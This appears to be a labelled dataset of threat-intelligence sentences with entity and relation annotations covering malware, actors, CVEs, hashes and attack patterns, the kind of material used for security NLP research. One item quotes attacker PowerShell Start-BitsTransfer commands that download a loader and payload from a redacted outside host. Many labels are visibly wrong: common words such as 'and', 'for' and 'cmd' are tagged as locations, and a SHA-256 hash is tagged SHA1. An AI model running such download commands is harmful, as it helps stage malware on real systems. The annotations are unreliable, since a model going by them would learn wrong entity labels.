id
int64
1
14.4k
text
stringlengths
3
5.01k
entities
list
relations
list
Comments
list
373
If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems.
[ { "id": 46068, "label": "attack-pattern", "start_offset": 55, "end_offset": 76 }, { "id": 46069, "label": "attack-pattern", "start_offset": 81, "end_offset": 99 } ]
[]
[]
6,520
Command and Scripting Interpreter: Windows Command Shell – T1059.003
[ { "id": 20204, "label": "location", "start_offset": 8, "end_offset": 11 }, { "id": 20205, "label": "attack-pattern", "start_offset": 12, "end_offset": 21 }, { "id": 20206, "label": "location", "start_offset": 51, "end_offset": 56 } ]
[]
[]
2,370
Earth Baku deploys its ongoing campaign, which can be traced to as far back as July 2020, through multiple attack vectors that are designed based on different exploits or the infrastructure of its targeted victim's environment: • SQL injection to upload a malicious file • Installment through InstallUtil.exe in a scheduled task • Possibly a malicious link (LNK) file sent as an email attachment • Exploitation of the ProxyLogon vulnerability CVE-2021-26855 to upload a China Chopper web shell This campaign uses previously unidentified shellcode loaders, which we have named StealthVector and StealthMutant, and a backdoor, which we have dubbed ScrambleCross.
[ { "id": 45480, "label": "threat-actor", "start_offset": 0, "end_offset": 10 }, { "id": 45472, "label": "vulnerability", "start_offset": 444, "end_offset": 458 }, { "id": 45474, "label": "malware", "start_offset": 578, "end_offset": 591 }, { "id": 45475, "label": "malware", "start_offset": 596, "end_offset": 609 }, { "id": 45476, "label": "malware", "start_offset": 648, "end_offset": 661 }, { "id": 45477, "label": "TIME", "start_offset": 79, "end_offset": 88 }, { "id": 45478, "label": "FILEPATH", "start_offset": 294, "end_offset": 309 }, { "id": 45479, "label": "vulnerability", "start_offset": 419, "end_offset": 429 }, { "id": 7033, "label": "attack-pattern", "start_offset": 231, "end_offset": 244 }, { "id": 7034, "label": "attack-pattern", "start_offset": 315, "end_offset": 329 }, { "id": 7036, "label": "malware", "start_offset": 471, "end_offset": 484 } ]
[ { "id": 100, "from_id": 45479, "to_id": 45472, "type": "duplicate-of" }, { "id": 323, "from_id": 45480, "to_id": 7033, "type": "uses" }, { "id": 324, "from_id": 45480, "to_id": 7034, "type": "uses" } ]
[]
1,047
Patches for this vulnerability are available as part of the September 2017 Android Security Bulletin.
[ { "id": 44922, "label": "TIME", "start_offset": 60, "end_offset": 74 }, { "id": 44923, "label": "SOFTWARE", "start_offset": 75, "end_offset": 83 } ]
[]
[]
1,544
How the Attacks are Carried Out: Via Email
[]
[]
[]
295
We routinely observe vulnerable devices across the global internet, despite the fact that most of these CVEs are more than two years old.
[]
[]
[]
4,982
The first campaign, detected in August 2021, used Chrome on a Samsung Galaxy S21 and the web server immediately replied with a HTTP redirect (302) pointing to the following intent URL.
[ { "id": 51038, "label": "TIME", "start_offset": 32, "end_offset": 43 }, { "id": 51039, "label": "SOFTWARE", "start_offset": 50, "end_offset": 56 } ]
[]
[]
3,383
BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe Silverlight_ins.exe
[ { "id": 10230, "label": "malware", "start_offset": 0, "end_offset": 11 }, { "id": 10231, "label": "SHA2", "start_offset": 46, "end_offset": 110 }, { "id": 49034, "label": "FILEPATH", "start_offset": 112, "end_offset": 131 }, { "id": 49033, "label": "malware", "start_offset": 20, "end_offset": 44 } ]
[ { "id": 578, "from_id": 10230, "to_id": 49033, "type": "duplicate-of" }, { "id": 579, "from_id": 49034, "to_id": 10231, "type": "duplicate-of" }, { "id": 580, "from_id": 49034, "to_id": 49033, "type": "indicates" }, { "id": 581, "from_id": 10231, "to_id": 49033, "type": "indicates" } ]
[]
11,447
For users, Android provides safety and control over how apps and third parties can access the data from their devices.
[ { "id": 34975, "label": "tools", "start_offset": 28, "end_offset": 34 }, { "id": 34976, "label": "location", "start_offset": 35, "end_offset": 38 }, { "id": 34977, "label": "location", "start_offset": 61, "end_offset": 64 }, { "id": 34979, "label": "location", "start_offset": 79, "end_offset": 82 } ]
[]
[]
13,671
Here are some of the X-Mailers we observed:
[]
[]
[]
10,783
Initial investigation
[]
[]
[]
2,651
The notes claimed the threat actors would pay “millions of dollars” to insiders who provided access to corporate networks or facilitated a ransomware infection by opening a phishing email and/or launching a payload manually.
[ { "id": 47840, "label": "attack-pattern", "start_offset": 173, "end_offset": 187 } ]
[]
[]
4,566
The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.
[ { "id": 50395, "label": "campaign", "start_offset": 4, "end_offset": 21 }, { "id": 50396, "label": "attack-pattern", "start_offset": 27, "end_offset": 58 }, { "id": 50397, "label": "SOFTWARE", "start_offset": 76, "end_offset": 92 }, { "id": 50398, "label": "location", "start_offset": 177, "end_offset": 184 } ]
[ { "id": 957, "from_id": 50395, "to_id": 50396, "type": "uses" }, { "id": 958, "from_id": 50395, "to_id": 50397, "type": "targets" } ]
[]
9,533
One of the variants we analyzed had an interesting destructive feature: It replaces the master boot record (MBR) to display an explicit message (“I am virus ! F*ck you :-)”).
[]
[]
[]
5,440
The indicators of compromise (IOCs) can be found in this appendix and the C&C server validation script can be accessed via this text file.
[]
[]
[]
3,060
The app requests that the user pay 4.99$ per month for full protection.
[]
[]
[]
9,600
GeckoHtmlElement > (
[]
[]
[]
2,256
This interval value is set in the following registry key: HKCU\Software\Microsoft\HY08A\Policy Additionally, in the event the C2 response instructs the malware to update C2 URLs, it will be in the following format: 1001; [unique_identifier] [url] The malware will encrypt the URL string with a 4-byte XOR key of “\x01\x02\x03\x04” and store this data in the following registry key: HKCU\Software\Microsoft\HY08A\[unique_identifier] The TDrop2 malware family that was witnessed in a recent attack against a European transportation company provided a minimal set of commands to the attackers.
[ { "id": 45428, "label": "REGISTRYKEY", "start_offset": 59, "end_offset": 95 }, { "id": 45430, "label": "malware", "start_offset": 442, "end_offset": 448 }, { "id": 6702, "label": "REGISTRYKEY", "start_offset": 387, "end_offset": 435 }, { "id": 47329, "label": "location", "start_offset": 512, "end_offset": 520 } ]
[]
[]
594
And we’ve seen that in adapting their attacks to better evade detection, they’ve specialized their operations around the globe.
[]
[]
[]
1,674
A complete list of the possible commands available in NetWire was documented by CIRCL in April. The NetWire decoder uses data from a packet capture file to generate the client and server session keys then decode the remaining encrypted packets.
[ { "id": 45092, "label": "malware", "start_offset": 55, "end_offset": 62 }, { "id": 45093, "label": "malware", "start_offset": 102, "end_offset": 109 } ]
[]
[]
8,145
Figure 14.
[]
[]
[]
9,929
IP address
[]
[]
[]
12,990
TAG would like to thank the Yahoo! Paranoids Advanced Cyber Threats Team for their collaboration in this investigation.
[]
[]
[]
5,459
By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
[]
[]
[]
441
When we’re talking about online shopping, clearly there’s no threat here to the retailer: they’re the ones doing the attacking.
[]
[]
[]
14,306
It has the ability to extract plaintext passwords, hash, PIN code, and Kerberos tickets from memory.
[ { "id": 48525, "label": "SOFTWARE", "start_offset": 71, "end_offset": 80 } ]
[]
[]
990
Related Sample Hash Values Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!
[]
[]
[]
10,304
IMAP RAT Trojan.MSIL.OCEANMAP.A Troj.Win32.TRX.XXPE50FFF039 3384a9ef3438bf5ec89f268000cc7c83f15e3cdf746d6a93945add300423f756 email.exe
[ { "id": 31453, "label": "SHA1", "start_offset": 63, "end_offset": 127 } ]
[]
[]
420
Obviously, this impact is potentially dire for shoppers and retailers as it directly impacts and harms the online shopping experience.
[]
[]
[]
9,640
The main function of the dropper
[]
[]
[]
5,954
Related IOCs
[]
[]
[]
807
The most sophisticated attacks can – and do – blend these actions together, sometimes using multiple stolen credentials to penetrate networks, move laterally within them, elevate privileges, and then access and steal data. Prevention of credential theft is too often overlooked.
[ { "id": 46361, "label": "attack-pattern", "start_offset": 238, "end_offset": 254 }, { "id": 44864, "label": "attack-pattern", "start_offset": 101, "end_offset": 119 }, { "id": 44865, "label": "attack-pattern", "start_offset": 143, "end_offset": 157 }, { "id": 44866, "label": "attack-pattern", "start_offset": 171, "end_offset": 188 }, { "id": 44867, "label": "attack-pattern", "start_offset": 200, "end_offset": 221 } ]
[]
[]
5,492
In another chat room called “Maira’s room”, a target of interest disclosed he was a government officer traveling back from a northern city near the country’s provincial capital.
[]
[]
[]
5,401
Conclusion and security recommendations
[]
[]
[]
7,574
Digitally signed FlawedAmmyy downloader
[ { "id": 23621, "label": "malware", "start_offset": 17, "end_offset": 28 } ]
[]
[]
7,585
This NSIS installer has two files: (nsExec.dll and repotaj.dll) and [NSIS].nsi.
[ { "id": 23646, "label": "malware", "start_offset": 5, "end_offset": 9 }, { "id": 23648, "label": "location", "start_offset": 47, "end_offset": 50 }, { "id": 23649, "label": "location", "start_offset": 64, "end_offset": 67 } ]
[]
[]
8,793
In June, we announced that we saw phishing attempts against the personal email accounts of staffers on the Biden and Trump campaigns by Chinese and Iranian APTs (Advanced Persistent Threats) respectively.
[ { "id": 27215, "label": "attack-pattern", "start_offset": 34, "end_offset": 42 }, { "id": 27217, "label": "location", "start_offset": 113, "end_offset": 116 }, { "id": 27220, "label": "location", "start_offset": 144, "end_offset": 147 } ]
[]
[]
3,565
To understand where this value is coming from, let’s take a look at the open-source ConfuserEx tool to see how the values are created.
[ { "id": 49350, "label": "tools", "start_offset": 85, "end_offset": 96 } ]
[]
[]
13,124
But such initiatives must be built on solid, secure foundations.
[]
[]
[]
13,543
Instead, malicious scripts are being executed when the administrators look into customer orders in their online shop’s administration panel.
[ { "id": 51614, "label": "identity", "start_offset": 55, "end_offset": 69 }, { "id": 51615, "label": "SOFTWARE", "start_offset": 105, "end_offset": 139 }, { "id": 51616, "label": "malware", "start_offset": 9, "end_offset": 26 } ]
[ { "id": 1112, "from_id": 51616, "to_id": 51615, "type": "targets" }, { "id": 1113, "from_id": 51614, "to_id": 51615, "type": "uses" } ]
[]
2,641
(Please see the Conclusion section for more detail.) LockBit 2.0 Overview Victimology Leak Site Data Unit 42 Incident Response Data on LockBit 2.0 LockBit 2.0 Tactics, Techniques and Procedures LockBit 2.0 Technical Details LockBit 3.0 Courses of Action Conclusion
[ { "id": 47828, "label": "malware", "start_offset": 148, "end_offset": 159 }, { "id": 47825, "label": "malware", "start_offset": 54, "end_offset": 65 }, { "id": 47826, "label": "identity", "start_offset": 102, "end_offset": 109 }, { "id": 47827, "label": "malware", "start_offset": 136, "end_offset": 147 }, { "id": 47829, "label": "malware", "start_offset": 195, "end_offset": 206 }, { "id": 47830, "label": "malware", "start_offset": 225, "end_offset": 236 } ]
[]
[]
1,241
However, Palo Alto Networks users are protected from these PUAs by subscribing to WildFire and GlobalProtect services.
[ { "id": 46624, "label": "SOFTWARE", "start_offset": 95, "end_offset": 108 }, { "id": 46625, "label": "identity", "start_offset": 9, "end_offset": 27 }, { "id": 46622, "label": "SOFTWARE", "start_offset": 82, "end_offset": 90 } ]
[]
[]
11,020
In the video, they purported to show a successful working exploit that spawns a cmd.exe shell, but a careful review of the video shows the exploit is fake.
[ { "id": 33606, "label": "malware", "start_offset": 80, "end_offset": 87 }, { "id": 33607, "label": "location", "start_offset": 88, "end_offset": 93 } ]
[]
[]
369
This post is also available in: 日本語 (Japanese) On June 2, Volexity reported that over Memorial Day weekend, they identified suspicious activity on two internet-facing servers running Atlassian’s Confluence Server application.
[ { "id": 44719, "label": "TIME", "start_offset": 56, "end_offset": 63 }, { "id": 44720, "label": "identity", "start_offset": 64, "end_offset": 72 }, { "id": 44721, "label": "SOFTWARE", "start_offset": 189, "end_offset": 211 } ]
[]
[]
4,037
After the threat actors get access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use bitsadmin to download the next-stage loader (loaders are detected as Nerapack) as well as its payload file (.bin). C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.exe' "%temp%/dfmanager.exe"}" C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.bin' "C:\Users\<redacted>\AppData\Local\Temp/dfmanager.bin"}"
[ { "id": 49882, "label": "attack-pattern", "start_offset": 92, "end_offset": 102 }, { "id": 49888, "label": "FILEPATH", "start_offset": 385, "end_offset": 405 }, { "id": 49891, "label": "URL", "start_offset": 566, "end_offset": 618 }, { "id": 49889, "label": "FILEPATH", "start_offset": 409, "end_offset": 466 }, { "id": 49883, "label": "tools", "start_offset": 113, "end_offset": 122 }, { "id": 49884, "label": "malware", "start_offset": 182, "end_offset": 190 }, { "id": 49885, "label": "threat-actor", "start_offset": 10, "end_offset": 23 }, { "id": 49886, "label": "FILEPATH", "start_offset": 228, "end_offset": 285 }, { "id": 49887, "label": "URL", "start_offset": 346, "end_offset": 382 }, { "id": 49881, "label": "vulnerability", "start_offset": 68, "end_offset": 87 }, { "id": 49890, "label": "URL", "start_offset": 527, "end_offset": 563 } ]
[ { "id": 889, "from_id": 49885, "to_id": 49881, "type": "exploits" }, { "id": 890, "from_id": 49885, "to_id": 49882, "type": "uses" }, { "id": 891, "from_id": 49885, "to_id": 49883, "type": "uses" }, { "id": 892, "from_id": 49883, "to_id": 49884, "type": "downloads" } ]
[]
5,540
Some 17,000 sites were recently compromised in this way.
[]
[]
[]
360
As the OpenSSL library is so widely used, some administrators may be finding unpatched systems for years to come.
[ { "id": 44717, "label": "SOFTWARE", "start_offset": 7, "end_offset": 22 } ]
[]
[]
9,996
Remote access tool w.exe IIS 6 WebDav Exploit Tool Exploit tool for CVE-2017-7269 (IIS 6) Web.exe WebBrowserPassView Recover password stored by browser smb.exe Scanner
[ { "id": 30512, "label": "location", "start_offset": 0, "end_offset": 6 }, { "id": 30513, "label": "location", "start_offset": 14, "end_offset": 18 }, { "id": 30514, "label": "location", "start_offset": 46, "end_offset": 50 }, { "id": 30515, "label": "location", "start_offset": 59, "end_offset": 63 }, { "id": 30516, "label": "malware", "start_offset": 98, "end_offset": 116 } ]
[]
[]
1,903
As with Bahamut applications, once downloaded and executed, it showed multiple malicious features that deal with stealing information.
[ { "id": 47030, "label": "attack-pattern", "start_offset": 113, "end_offset": 133 }, { "id": 47029, "label": "threat-actor", "start_offset": 8, "end_offset": 15 } ]
[ { "id": 290, "from_id": 47029, "to_id": 47030, "type": "uses" } ]
[]
11,737
Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.
[ { "id": 36168, "label": "attack-pattern", "start_offset": 62, "end_offset": 70 } ]
[]
[]
4,039
Moreover, in its newer version, it uses a technique called “Timestomping.”
[]
[]
[]
4,589
On March 2, Volexity reported in-the-wild exploitation of the vulnerabilities, to which DEVCORE confirmed that the exploit observed by Volexity was the one submitted to MSRC.
[ { "id": 50451, "label": "TIME", "start_offset": 3, "end_offset": 10 }, { "id": 50452, "label": "identity", "start_offset": 12, "end_offset": 20 }, { "id": 50453, "label": "identity", "start_offset": 88, "end_offset": 95 }, { "id": 50454, "label": "identity", "start_offset": 135, "end_offset": 143 }, { "id": 50455, "label": "identity", "start_offset": 169, "end_offset": 173 } ]
[]
[]
12,496
We use our research to continuously improve the safety and security of our products and share this intelligence with the community to benefit the internet as a whole.
[ { "id": 38881, "label": "tools", "start_offset": 48, "end_offset": 54 }, { "id": 38882, "label": "location", "start_offset": 55, "end_offset": 58 }, { "id": 38883, "label": "location", "start_offset": 59, "end_offset": 67 }, { "id": 38884, "label": "location", "start_offset": 84, "end_offset": 87 }, { "id": 38885, "label": "location", "start_offset": 121, "end_offset": 130 } ]
[]
[]
297
This directive requires agencies to remediate all vulnerabilities that CISA includes in their KEV catalog based on an assessment that the vulnerabilities “carry significant risk to the federal enterprise.”
[ { "id": 45995, "label": "identity", "start_offset": 71, "end_offset": 75 } ]
[]
[]
5,084
Victims who clicked on the links would be served a hidden iframe that would trigger the exploit kit.
[]
[]
[]
632
When the user reboots their PC, the modified MBR prevents Windows from loading and displays a fake “chkdisk” screen which indicates the computer's hard drive is being repaired, but the malware is actually encrypting the user's files.
[ { "id": 46220, "label": "SOFTWARE", "start_offset": 58, "end_offset": 65 }, { "id": 46219, "label": "SOFTWARE", "start_offset": 45, "end_offset": 48 } ]
[]
[]
4,339
are checked.
[]
[]
[]
2,016
The first type of packer is a modified version of UPX.
[ { "id": 45223, "label": "tools", "start_offset": 50, "end_offset": 53 } ]
[]
[]
5,805
We'll talk about it [00:03:00] here now, but I think when we talk in terms for, especially for here is like cyber conflict, cyber war, or hybrid, and the hybrid piece is just a definition of kinetic and cyber.
[ { "id": 17957, "label": "TIME", "start_offset": 21, "end_offset": 29 }, { "id": 17958, "label": "location", "start_offset": 130, "end_offset": 133 }, { "id": 17959, "label": "location", "start_offset": 146, "end_offset": 149 }, { "id": 17960, "label": "identity", "start_offset": 170, "end_offset": 174 }, { "id": 17961, "label": "location", "start_offset": 199, "end_offset": 202 } ]
[]
[]
5,817
But as we’ve seen, it's an interesting concept because traditionally cyber has just been more of an information gathering or cyber espionage tool to aid any type of conflict.
[ { "id": 17978, "label": "identity", "start_offset": 79, "end_offset": 83 }, { "id": 17979, "label": "location", "start_offset": 141, "end_offset": 145 }, { "id": 17980, "label": "location", "start_offset": 157, "end_offset": 161 } ]
[]
[]
10,180
In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.
[ { "id": 31079, "label": "location", "start_offset": 85, "end_offset": 88 }, { "id": 31081, "label": "attack-pattern", "start_offset": 163, "end_offset": 171 } ]
[]
[]
9,575
A new form is displayed if the information is not provided via command prompt.
[]
[]
[]
280
Several western governments have proposed broad recommendations focused on technical hygiene.
[ { "id": 45967, "label": "identity", "start_offset": 8, "end_offset": 27 } ]
[]
[]
5,082
The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities.
[ { "id": 51189, "label": "identity", "start_offset": 64, "end_offset": 70 }, { "id": 51191, "label": "identity", "start_offset": 83, "end_offset": 89 }, { "id": 51190, "label": "identity", "start_offset": 72, "end_offset": 78 } ]
[]
[]
502
By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
[]
[]
[]
3,900
This shows how vulnerable smart factories are when it comes to various cyberattacks, such as ransomware.
[]
[]
[]
9,295
The loaded script is the main script that steals the payment information.
[]
[]
[]
2,479
Upon further analysis, the t.sh script hosted on this remote server is related to the Mirai botnet.
[ { "id": 47554, "label": "FILEPATH", "start_offset": 27, "end_offset": 31 }, { "id": 47553, "label": "malware", "start_offset": 86, "end_offset": 98 } ]
[]
[]
13,039
Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days.
[]
[]
[]
9,742
If the targeted victims enable macros, then the malicious process continues.
[]
[]
[]
2,885
The following code is snippet from the disassembled ActionScript code of CVE-2014-1776.
[ { "id": 48082, "label": "vulnerability", "start_offset": 73, "end_offset": 86 } ]
[]
[]
710
If there’s a long-term consideration here, it’s to install perfect forward secrecy, as Twitter did last year.
[ { "id": 46278, "label": "SOFTWARE", "start_offset": 88, "end_offset": 95 } ]
[]
[]
13,885
March 2021:
[]
[]
[]
11,165
We terminated 186 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China.
[]
[]
[]
11,167
We terminated 1,098 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to China.
[]
[]
[]
4,333
Figure 3.
[]
[]
[]
13,081
Share them in the comments below or follow me on Twitter to continue the conversation: @JonLClay.
[ { "id": 48898, "label": "SOFTWARE", "start_offset": 49, "end_offset": 57 } ]
[]
[]
5,504
At the time of research, there were around 60 victims whose data were uploaded to Confucius-owned cloud storage account.
[ { "id": 51518, "label": "threat-actor", "start_offset": 82, "end_offset": 91 } ]
[]
[]
203
An initial investigation into the DDoS attacks suggested that Mirai and Meris bot networks may have been leveraged in the attacks.
[ { "id": 45900, "label": "malware", "start_offset": 72, "end_offset": 90 }, { "id": 45898, "label": "attack-pattern", "start_offset": 34, "end_offset": 46 }, { "id": 45899, "label": "malware", "start_offset": 62, "end_offset": 67 } ]
[]
[]
1,341
Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot!
[]
[]
[]
9,367
Infrastructure analysis
[]
[]
[]
1,404
Kuluoz makes money for its owner by installing other malware, such as crimeware or fake antivirus programs.
[ { "id": 45008, "label": "malware", "start_offset": 0, "end_offset": 6 }, { "id": 45009, "label": "attack-pattern", "start_offset": 70, "end_offset": 79 }, { "id": 45010, "label": "attack-pattern", "start_offset": 83, "end_offset": 106 } ]
[ { "id": 53, "from_id": 45008, "to_id": 45009, "type": "uses" }, { "id": 54, "from_id": 45008, "to_id": 45010, "type": "uses" } ]
[]
13,125
Trend Micro blocked 101% more cloud-based email threats in 2021 than the previous year.
[ { "id": 48903, "label": "TIME", "start_offset": 59, "end_offset": 63 }, { "id": 48904, "label": "identity", "start_offset": 0, "end_offset": 11 } ]
[]
[]
11,739
In collaboration with YouTube, Gmail, Trust & Safety, CyberCrime Investigation Group and Safe Browsing teams, our protections have decreased the volume of related phishing emails on Gmail by 99.6% since May 2021.
[ { "id": 36179, "label": "location", "start_offset": 85, "end_offset": 88 }, { "id": 36181, "label": "attack-pattern", "start_offset": 163, "end_offset": 171 } ]
[]
[]
1,811
Figure 9. The PowerShell downloading and installing AnyDeskMSI
[ { "id": 5340, "label": "tools", "start_offset": 19, "end_offset": 29 }, { "id": 46932, "label": "tools", "start_offset": 57, "end_offset": 67 } ]
[ { "id": 263, "from_id": 5340, "to_id": 46932, "type": "downloads" } ]
[]
2,530
In one recent case, Conti did not return a client’s files who had paid the ransom.
[ { "id": 47724, "label": "threat-actor", "start_offset": 21, "end_offset": 26 } ]
[]
[]
12,916
Figure 8 - Carbanak and FIN7 evaluation, 65 ATT&CK techniques across 11 ATT&CK tactics are in scope for this evaluation.
[ { "id": 40215, "label": "threat-actor", "start_offset": 18, "end_offset": 26 }, { "id": 40216, "label": "location", "start_offset": 27, "end_offset": 30 }, { "id": 40220, "label": "location", "start_offset": 94, "end_offset": 97 } ]
[]
[]
719
The Atlassian products vulnerable to CVE-2021-26084 are those using the following versions of Confluence Server and Data Center: Confluence Cloud customers are not affected by this vulnerability.
[ { "id": 46287, "label": "identity", "start_offset": 5, "end_offset": 14 }, { "id": 46288, "label": "vulnerability", "start_offset": 38, "end_offset": 52 }, { "id": 46290, "label": "SOFTWARE", "start_offset": 131, "end_offset": 147 }, { "id": 46289, "label": "SOFTWARE", "start_offset": 95, "end_offset": 128 } ]
[ { "id": 180, "from_id": 46289, "to_id": 46288, "type": "has" } ]
[]
2,662
As of May 25, LockBit 2.0 accounted for 46% of all ransomware-related breach events for 2022 shared on leak sites.
[ { "id": 47850, "label": "TIME", "start_offset": 6, "end_offset": 12 }, { "id": 47851, "label": "threat-actor", "start_offset": 14, "end_offset": 25 }, { "id": 47852, "label": "TIME", "start_offset": 88, "end_offset": 92 } ]
[]
[]
5,553
Payment systems like Apple Pay and Google Pay can offer more protection.
[ { "id": 51542, "label": "SOFTWARE", "start_offset": 21, "end_offset": 30 }, { "id": 51543, "label": "SOFTWARE", "start_offset": 35, "end_offset": 45 } ]
[]
[]
7,548
It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. Indicators of Compromise (IOCs) Hashes detected as W2KM_VALYRIA.DOCT: 009cc0f34f60467552ef79c3892c501043c972be55fe936efb30584975d45ec0 153117aa54492ca955b540ac0a8c21c1be98e9f7dd8636a36d73581ec1ddcf58 18479a93fc2d5acd7d71d596f27a5834b2b236b44219bb08f6ca06cf760b74f6 18cf5795c2208d330bd297c18445a9e25238dd7f28a1a6ef55e2a9239f5748cd 1ee9649a2f9b2c8e0df318519e2f8b4641fd790a118445d7a0c0b3c02b1ba942 2727bf97d7e2a5e7e5e41ccbfd7237c59023d70914834400da1d762d96424fde 2cea0b740f338c513a6390e7951ff3371f44c7c928abf14675b49358a03a5d13 3b1d8dcbc8072b1ec10f5300c3ea9bb20db71bd8fa443d97332790b74584a115 3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c 3da24cd3af9a383b731ce178b03c68a813ab30f4c7c8dfbc823a32816b9406fb 6edc067fc2301d7a972a654b3a07398d9c8cbe7bb38d1165b80ba4a13805e5ac 76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338 9038ba1b7991ff38b802f28c0e006d12d466a8e374d2f2a83a039aabcbe76f5c 93745a6605a77f149471b41bd9027390c91373558f62058a7333eb72a26faf84 a70aca719b06fc8ef0cd0b0e010c7bc8dc6d632e4f2f874e4c0e553bd8db2df2 aa60c1fae6a0ef3b9863f710e46f0a7407cf0feffa240b9a4661a4e8884ac627 af5f102f0597db9f5e98068724e31d68b8f7c23baeea536790c50db587421102 cee801b7a901eb69cd166325ed3770daffcd9edd8113a961a94c8b9ddf318c88 d07d4e71927cab4f251bcc216f560674c5fb783add9c9f956d3fc457153be025 dfbd67177af9d35188fc9ff9363c2b9017e9ccfe6719e3d641a56fb5dc0d47f7 eff78c23790ee834f773569b52cddb01dc3c4dd9660f5a476af044ef6fe73894 fbbda9d8d9bcaaf9a7af84d08af3f5140f5f75778461e48253dc761cc9dc027c Hash detected as VBS_VALYRIA.DOCT: 0A9FC303CA03F4D9988A366CBBD96C24857E87374568EC5A4AAA4E55FE2C3C7E 0BC10D5396B3D8ECC54D806C59177B74E167D9F39D8F1B836806127AF36A7C4E 0BC10D5396B3D8ECC54D806C59177B74E167D9F39D8F1B836806127AF36A7C4E 25186621282D1E1BAD649B053BDB7B56E48B38189F80DB5A69B92301EF9ED613 25186621282D1E1BAD649B053BDB7B56E48B38189F80DB5A69B92301EF9ED613 3607432758176a2c41a1971b3c4d14a992a68b231851f8b81c6e816ea9ea29b2 59F9E0FAA73E93537AE4BD3A8695874BA25B66CEFA017537132914C770D0CF70 59F9E0FAA73E93537AE4BD3A8695874BA25B66CEFA017537132914C770D0CF70 59F9E0FAA73E93537AE4BD3A8695874BA25B66CEFA017537132914C770D0CF70 6228d79f56c574ceada16453404c54dd95641aa78d3faed6874daf485116793b 66af894eee6daae66bf0bcb87cb7abe2a0ebb6a59779f652db571e7ee298d751 92C7FEAD5EE0F0ECD35FE247DBE85648AADA4B96F1E960B527B4929E42D47B01 c006911be5480f09e0d8560c167561f68681607ca8f7e3c4f5d476dc6673594f F05C18C1D4428349137A9DF60CDEBE8A0F9E6DA47B359DC0616FF8D47E46704E Hash detected as TROJ_VALYRIA.PS: 0065d592d739ac1dd04d0335151c8855c7fafbf03e86134510ac2fc6766e8d60 0073ce0f4c82fc4d0470868e124aab9ad08852e1712564136186e5019fca0da0 02F58256FF52ED1CDB21064A28D6E5320005F02EF16E8B2FE851438BBC62A102 02F58256FF52ED1CDB21064A28D6E5320005F02EF16E8B2FE851438BBC62A102 04d61b1d2c3187280b3c4e93d064a051e9ee0f515f74c6c1c44ba577a7a1c804 04d61b1d2c3187280b3c4e93d064a051e9ee0f515f74c6c1c44ba577a7a1c804 0A9FC303CA03F4D9988A366CBBD96C24857E87374568EC5A4AAA4E55FE2C3C7E 0A9FC303CA03F4D9988A366CBBD96C24857E87374568EC5A4AAA4E55FE2C3C7E 4DD5C3CE5ED2145D5AFA8DD476A83DFC693E5FC7216C1EABB3FA0EB6B5F8590D 4DD5C3CE5ED2145D5AFA8DD476A83DFC693E5FC7216C1EABB3FA0EB6B5F8590D 55ae821cf112ff8d6185ce021f777f73d85150c62a835bb1c02fe9e7b3f863bf 61d846708f50024e1c65237eb7158beac9b9c5840853b03ef7c73fe5293a9a8d 624762a90b7272e247e5022576b7912d1aa0b32bc13aabc7ee47197e5b87a41b 6421C22D854C199B761436C87CAE1EAFFBA8783A3A40C00D4A0982D7C242EA79 92C7FEAD5EE0F0ECD35FE247DBE85648AADA4B96F1E960B527B4929E42D47B01 a53f832edc18de51e0ffaf67047072a6bbd5237defa74f5bf35dfc0df2aeca1b C1780F3AD76AF703CEDDD932B187CF919866A00BB3E2D6F0827B9DAE9D8875B6 C1780F3AD76AF703CEDDD932B187CF919866A00BB3E2D6F0827B9DAE9D8875B6 C9D782FFAA98791613FEF828E558B296932FA245192BD0EBA8F76536860DB84E C9D782FFAA98791613FEF828E558B296932FA245192BD0EBA8F76536860DB84E CCA8E84901C4184BE2849D29C39294FD4B6940F9A6668FDCFF9728CD319FFF96 CCA8E84901C4184BE2849D29C39294FD4B6940F9A6668FDCFF9728CD319FFF96 cca8e84901c4184be2849d29c39294fd4b6940f9a6668fdcff9728cd319fff96 e57dbce8130e281a73727122d33cbff170a54237cd0016d79b30ace18c94e7d4 Hash detected as JS_VALYRIA.DOCT: 070EBCAC92FB7619F957BF3F362099574158E5D2D0BC0CF9206A31BA55EDD48F Scriptlets and inf files related to applocker bypass: 2791fdc54ee037589f951c718935397e43d5f3d5f8e078e8b1e81165a3aebbaf 288afbe21d69e79a1cff44e2db7f491af10381bcc54436a8f900bcbd2a752a6f 5e173fbdcd672dade12a87eff0baf79ec4e80533e2b5f6cf1fac19ad847acba0 Tags Network | APT & Targeted Attacks | Research
